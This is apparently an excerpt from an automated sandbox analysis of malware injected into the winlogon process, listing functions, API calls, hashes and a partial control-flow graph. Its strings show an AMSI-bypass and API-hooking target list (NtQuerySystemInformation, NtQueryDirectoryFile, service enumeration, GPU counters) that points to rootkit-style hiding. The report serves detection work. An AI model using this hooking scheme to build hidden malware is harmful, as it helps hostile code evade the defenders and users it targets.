                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: ecad29a5d92746c3c18f8328d0e188f3c62a98b5fc453ac47458802f6d7a0afc
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 26118E2E718F64A2EB159BA9E44C3697260F748F85F148435DE8D07794EF3DC548C700
                                                        Function 00000225DC612AB8 Relevance: 6.2, APIs: 4, Instructions: 241memorylibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Protect$AllocLibraryLoad
                                                        • String ID:
                                                        • API String ID: 3316853933-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 57904fb719dbcf7ce7db4895da7f5d34b6f39376f0c1471c62ba19f9c4407fb4
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 5E91327AB12AA097EF658F69D008769B3E1F754B9AF54C125DF4A47B88DA38D802C700
                                                        Function 00000225DC643E00 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction ID: 7368f0824190400fd5ed9cfb9fff0c2e4f110b6e7a9d9859b1506aa5e2943c8e
                                                        • Opcode Fuzzy Hash: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction Fuzzy Hash: A9314F3621EE98A1EA70DB9CF05835A76A0F388B85F508575F6CE46B98DF7DC581CB00
                                                        Function 00000225DC643618 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 00000225DC643631
                                                        • PathFindFileNameW.SHLWAPI ref: 00000225DC643640
                                                          • Part of subcall function 00000225DC643C70: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64255A), ref: 00000225DC643C88
                                                          • Part of subcall function 00000225DC643BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643657), ref: 00000225DC643BC6
                                                          • Part of subcall function 00000225DC643BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643657), ref: 00000225DC643BF4
                                                          • Part of subcall function 00000225DC643BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643657), ref: 00000225DC643C16
                                                          • Part of subcall function 00000225DC643BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643657), ref: 00000225DC643C34
                                                          • Part of subcall function 00000225DC643BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643657), ref: 00000225DC643C55
                                                        • CreateThread.KERNELBASE ref: 00000225DC643687
                                                          • Part of subcall function 00000225DC641D3C: GetCurrentThread.KERNEL32 ref: 00000225DC641D47
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: 9f01a0d394e9f497953db1b42ee56594c734cff64a0db99230737221b0b2cb23
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 37115E7C62CE36B2FB64ABE8A50D35A3690BB55B57F60C5B5E907856D0EF7CC104C600
                                                        Function 00000225DC645210 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: e1a380b039a1d49db448bdd609ecfca87e994cc091e9a901e35142708e003b4b
                                                        • Instruction ID: 86d1713a14f383e0431d41c073f07963a759e0e8e73e7186f31f9d4de3268f0f
                                                        • Opcode Fuzzy Hash: e1a380b039a1d49db448bdd609ecfca87e994cc091e9a901e35142708e003b4b
                                                        • Instruction Fuzzy Hash: F6F0303A61CF14A0D630DB59E44434B77A0F3887D5F548152F98E03B69DA38C290CF04
                                                        Function 00000225DC641AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                          • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416B2
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416DF
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641719
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC641734
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641754
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64178F
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417CA
                                                        • SleepEx.KERNELBASE ref: 00000225DC641AE3
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641805
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641840
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64187B
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC6418A0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 5cdb0bb0ba144f38185c4d45c3f0ba974282997b764186fa0b30638e5480d31c
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: A72146A921CE20E1FB50DBEFD9593A933A4A744BC7F04D4618E0F872A5EE34C451C200

                                                        Non-executed Functions

                                                        Function 00000225DC6481B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: ef80b3d61712d37991047624d5b70c5c4d71fb90542e1b129de85fb681dee4ce
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 08318F76219F90E6EB608FA4E8543EE7364F788B45F44852ADB4E47B98DF38C548C710
                                                        Function 00000225DC64B62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 05cd3e160029e1e732615cc7e20f52405f780a1c2cb12fa09db82b9c2cc8f869
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 7231853A218F90A6DB60CF69E8447DE73A4F788B55F544526EB8E43BA8DF38C145CB00
                                                        Function 00000225DC650018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 03c8dc79bdc2999bb57e8ee348579c7cb0382e07fa747561d973084f905eb7f7
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: C3E1127A728FA0AAE700CFA8D4882DD7BB1F745B89F24C116DE4E57B99DA34C416C700
                                                        Function 00000225DC61B150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 734ea35669d024df06483749a34a66f9902071fdec98b16f48637ea73e98c1c2
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 085106AA712FA4A5EF10CFEA98096AD27A1F788BD6F54C525EF0D07B85DA38C045C300
                                                        Function 00000225DC641D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00000225DC641D47
                                                          • Part of subcall function 00000225DC6420C0: GetModuleHandleA.KERNEL32(?,?,?,00000225DC641D79), ref: 00000225DC6420D8
                                                          • Part of subcall function 00000225DC6420C0: GetProcAddress.KERNEL32(?,?,?,00000225DC641D79), ref: 00000225DC6420E9
                                                          • Part of subcall function 00000225DC645F50: GetCurrentThreadId.KERNEL32 ref: 00000225DC645F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 7335be69b1a53d8260e79aad09e49a57f4a9151297e2b9092e57277930a4543d
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: 794185AC128D7AB0FA05DFDDE9597E43765A704B47FB1C453A41A031B69E38C28EC361
                                                        Function 00000225DC6412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: 4323ca25779d84a57c3c02923ca7ebc8007b87c3c86119a3830bb68bec69c950
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 81514D76214F9496E724CFBAE44C35A77A1F788F9AF148524DA4A07758DF3CC049CB00
                                                        Function 00000225DC616D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 9a4c01e7eb6cd6e3cc95c39396cf0bee9793080e8f643e4f7ddbe8a1a9e0a88d
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: E381442D616E61BAFF10AFEE944D35963E1EB61783F54C115EA49437A6DF38C842CB00
                                                        Function 00000225DC642FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 0912822af30d12dff6b279402dbf66905d85d22777380dab2996b8327d9d6299
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: B831B926618E65A6F720DFAAE80C359B3A0FB88FD7F548635DE4A43624DF38C455C740
                                                        Function 00000225DC6430B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 1a7a96c60956b87603b2adbb43b019170631b1eac3662604c8114e2770feac5a
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 4D317EA9628F65E6E750DFAAA84C75A73A1FB84F86F148535DE4B43724DF38C405C700
                                                        Function 00000225DC642C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 394 225dc642c10-225dc642c8d 396 225dc642e8c-225dc642eaf 394->396 397 225dc642c93-225dc642c99 394->397 397->396 398 225dc642c9f-225dc642ca2 397->398 398->396 399 225dc642ca8-225dc642cab 398->399 399->396 400 225dc642cb1-225dc642cc1 GetModuleHandleA 399->400 401 225dc642cd5 400->401 402 225dc642cc3-225dc642cd3 GetProcAddress 400->402 403 225dc642cd8-225dc642cf6 401->403 402->403 403->396 405 225dc642cfc-225dc642d1b StrCmpNIW 403->405 405->396 406 225dc642d21-225dc642d25 405->406 406->396 407 225dc642d2b-225dc642d35 406->407 407->396 408 225dc642d3b-225dc642d3f 407->408 408->396 409 225dc642d45 408->409 410 225dc642d4c-225dc642d5f 409->410 411 225dc642d61-225dc642d6d 410->411 412 225dc642d6f 410->412 413 225dc642d72-225dc642d76 411->413 412->413 414 225dc642d86 413->414 415 225dc642d78-225dc642d84 413->415 416 225dc642d89-225dc642d93 414->416 415->416 417 225dc642d99-225dc642d9c 416->417 418 225dc642eb0-225dc642eb4 416->418 421 225dc642db5-225dc642db8 417->421 422 225dc642d9e-225dc642db2 call 225dc641934 417->422 419 225dc642eb6-225dc642eb9 418->419 420 225dc642e6e-225dc642e81 418->420 424 225dc642ebb-225dc642ece call 225dc641934 419->424 425 225dc642ed1-225dc642ed4 419->425 420->410 423 225dc642e87 420->423 427 225dc642dba-225dc642dc5 421->427 428 225dc642e1f-225dc642e22 421->428 422->421 423->396 424->425 433 225dc642ed6-225dc642ee1 425->433 434 225dc642f02-225dc642f05 425->434 435 225dc642dea-225dc642ded 427->435 436 225dc642dc7-225dc642dd4 427->436 429 225dc642e34-225dc642e41 lstrlenW 428->429 430 225dc642e24 428->430 442 225dc642e55-225dc642e61 call 225dc643c70 429->442 443 225dc642e43-225dc642e4f call 225dc641bf4 429->443 440 225dc642e27-225dc642e2e call 225dc641bbc 430->440 433->434 444 225dc642ee3-225dc642ef0 433->444 434->429 438 225dc642f0b-225dc642f0d 434->438 435->428 439 225dc642def-225dc642dfa 435->439 437 225dc642dd8-225dc642dde 436->437 445 225dc642f19-225dc642f24 437->445 446 225dc642de4-225dc642de8 437->446 438->440 439->428 448 225dc642dfc-225dc642e09 439->448 440->429 440->445 459 225dc642f12 442->459 460 225dc642e67 442->460 443->442 443->459 451 225dc642ef4-225dc642efa 444->451 454 225dc642f26-225dc642f2a 445->454 455 225dc642f92-225dc642f99 445->455 446->435 446->437 456 225dc642e0d-225dc642e13 448->456 451->445 452 225dc642efc-225dc642f00 451->452 452->434 452->451 461 225dc642f2c-225dc642f30 454->461 462 225dc642f32-225dc642f47 call 225dc6489d0 454->462 455->420 456->445 463 225dc642e19-225dc642e1d 456->463 459->445 460->420 461->462 464 225dc642f4c-225dc642f4f 461->464 462->464 463->428 463->456 466 225dc642f51-225dc642f6a call 225dc6489d0 464->466 467 